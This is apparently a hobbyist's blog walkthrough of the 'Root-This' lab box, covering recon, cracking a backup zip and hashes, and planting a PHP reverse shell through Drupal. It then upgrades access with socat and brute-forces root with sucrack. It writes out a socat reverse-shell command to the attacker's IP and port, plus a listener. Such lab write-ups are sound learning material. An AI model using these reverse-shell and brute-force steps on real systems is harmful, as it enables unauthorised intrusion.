Root-This Walk-through

Another day another box, been somewhat busy with stuff, I really want to be active on my blog but my frequent changing to stuff on what to write, or what to do is killing me sometimes I do some vulnerable boxes or I just move into reading a book ( Web Application Hacker’s Handbook, cough cough) but I will manage my time better let’s start

So first is some recon a simple nmap scan to start

# Nmap 7.70 scan initiated Sat Apr  6 19:30:23 2019 as: nmap -sC -sV -p80 -oA nmap/rootthis-tcp 192.168.25.144
Nmap scan report for 192.168.25.144
Host is up (0.00034s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Apache2 Debian Default Page: It works
MAC Address: 00:0C:29:0D:A6:A8 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Apr  6 19:30:31 2019 -- 1 IP address (1 host up) scanned in 7.61 seconds

One port open let’s do some manual enumeration and try to get more detail’s on this port 80 I use curl here

Curl response

Ok by this we can tell there are no weird cookies, Bad Responses or so or proxies running so we can simply visit the page but it ends up being an Apache default page so I went with Gobuster to find any directories

A few directories here we notice that we get a CMS listed so we know it’s running Drupal The HTTP response status code 301 Moved Permanently doesn’t mean bad news necessarily but here backup looks more interesting for an OK response so we visit the directory

Drupal

A drupal web-page with a login on the right side we need to do a little more recon since we have no credentials whatsoever, so we can continue we also receive a BIN file from the backup directory, we can go for enumerating drupal or guess some passwords, I decided here to continue with a droopescan

A few plugin information and it’s version, some themes and the admin login page. I stopped here and continue with the BIN file received from the backup directory

I poked around the bin file and found out it was zipped and contained a sql DB

But it also contained a password

The beauty of offline cracking is that there are no limits on guessing and a File usually does not get blocked, so we can use this tool called fcrackzip to continue here and proceed with the rock-you word-list.

Found credential [thebackup]

I started the mysql server and imported the dump.sql file enumerated the file and found databases, tables and hashes

We get a username WEBMAN and a hash but also there are still a few more tables to enumerate as it seems that, this is a hash we cannot manage to crack in a matter of minutes so continuing we the other table we find more

These look a lot more like hashes more easier to crack there are incredible resources online where we can easily crack these in a matter of seconds here I got to Crack Station and get results

Now back to the Drupal Login page and…

Success but we also receive an error that there is a Drupal update and to fix some security issues, here it’s good news because we may find exploits to gain a shell access into the webserver usually it’s a low-level access but we might get lucky.

Once access to the drupal webiste we can activate the PHP Filter Module and add a reverse php shell onto a basic page
once this is done we want to continue to the following page and edit so every user can evaluate php code

All user’s must be checked

We continue with a simple php reverse shell from pentest monkey resource, its webpage or github repo work perfectly fine

Making sure we prepare a listener on our box the moment we save a shell is popped

Once in the OS we continue enumerating more to gain root privileges

After moving to the user directory we find a txt file that say’s

Hi root,

Your password for this machine is weak and within the first 300 words of the rockyou.txt wordlist. Fortunately root is not accessible via ssh. Please update the password to a more secure one.

Regards,
user

So here we need to be a little more creative in a way we cannot use all 14 million passwords for getting root so we need to cut these into the first 300 words and make a smaller wordlist

it also mentions that root isn’t accessible through ssh
if we remember our previous nmap scan we don’t have ssh access or a port listening on ssh

After a little more enumeration it seems that the box does not contain any compilers or permissions for this
and su cannot be run unless I upgrade to a terminal

No python 😦

The all mighty python is not on the box to upgrade

python -c 'import pty;pty.spawn("/bin/bash")'


No worries we cannot stop here, an incredible tool called socat will help us continue on our moment of needs, I downloaded a socat binary into the box pre-compiled as there are no compilers mentioned before in this box

an the following command on VICTIM

socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.25.142:4444 

and this on my Kalli

socat file:tty,raw,echo=0 tcp-listen:4444 

Verify su command

Now with a follow up here there are no way’s to BRUTE-FORCE a password remotely here so we need to do this locally using the SU command this incredible tool called sucrack will help us with this issue, as it will attempt to login using su – [PASSWORD] until it get’s a correct login, we let the tool run for a few minutes

root login

and the FLAG

Well what an incredible experience it sure demonstrated me very important things such as local brute-forcing that I was not aware of a few Shell upgrade’s without other languages present such as Python and just to keep enumerating and don’t be afraid to ask for help, I was lost here with the Shell upgrade

A few books Hackers Playbook, Red Team Field Manual and a few friends helped here, the best tip I received a while back is that It’s always good to work in a team to see the different approaches to a Box it just stuck in my head and never left

There are so many way’s to approach a machine and asking for help is never a weakness, keep at it with learning and always ask questions!!

Categories: Uncategorized

dmcxblue

Infosec Hobbyist, Wanna be Red-Teamer, Pentester Dreamer
OSCP | OSWP
GED- In Progress

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s